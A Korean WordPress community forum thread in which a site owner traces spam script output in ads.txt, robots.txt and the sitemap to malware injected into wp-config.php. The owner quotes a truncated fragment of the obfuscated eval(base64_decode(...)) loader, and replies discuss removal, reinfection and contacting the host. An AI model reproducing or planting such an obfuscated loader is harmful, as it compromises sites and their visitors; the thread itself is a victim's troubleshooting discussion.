Skip to main content

혹시 워드프레스 설정 잘 아시는 분 계신가요...

얼마전에 ads.txt에 해당스크립트가 우선 나와서 수집이 안되는 오류를 발견하고, 문제를 찾다가. robots.txt를 확인하고 삭제해서 문제가 해결되었는데요. 문제가 해결된게 아니었습니다.

사이트맵을 우연히 들어가봤는데 동일한 코드가 가장 최상단에 들어가있어서 아래처럼 에러가 나고 있더라고요.

그리고 다시 robots.txt를 들어가봤는데 거기에도 해당 코드가 삽입되어 있었습니다.

1.00

1.00

도대체 어디에 이게 박혀있길래 자꾸 뜨는걸까요

범인은 wp-config.php 가장 윗줄에 아래 코드가 삽입되어 있었습니다.

eval(base64_decode("aW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAwKTsKaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsIDApOwoKaWYgKFBIUF9TQVBJICE9PSAiY2xpIiAmJiAoCiAgICBz>

Issac Lee

ㅠ 이게 사이트 따라 달라서 제가 그냥 봐서는 왜 그런지 모릅니다ㅠ

Issac Lee

일단 동일 현상 다른분들 아시는 분 계실수 있을것 같아 워플러 게시판으로 옮겼습니다.

고시

Issac Lee 제미나이 열심히 두드려본 결과 wp-config.php파일에 악성코드 심어져 있었습니다. 지우니까 멀쩡하게 나옵니다. .하.. 이거 때문에 수익도 무너진거 같습니다. ㅠㅠ

고시

이게 어떤경로로 침입했는지 찾아봐야하는데 하 개발지식이 딸려서 고민이네요..

고시

서버단에서 수정했는데 또 생성되었네요.. 하 미치고 팔짝 뜁니닷!

Issac Lee

고시 이거 호스팅 차원에서 혹시 방어가 안되나요? 해당 호스팅업체 문의해보시면 좋을것 같은데요?

고시

Issac Lee 호스팅차원에서 문의해봐야겠습니다~!

고시

동일 링크주소가 Wp-rocket 플러그인에서 발견되고있어서, 일단 다 지웠습니다. 내일 또 생성되는지 확인 해보겠습니다. ㅠㅠ

1.00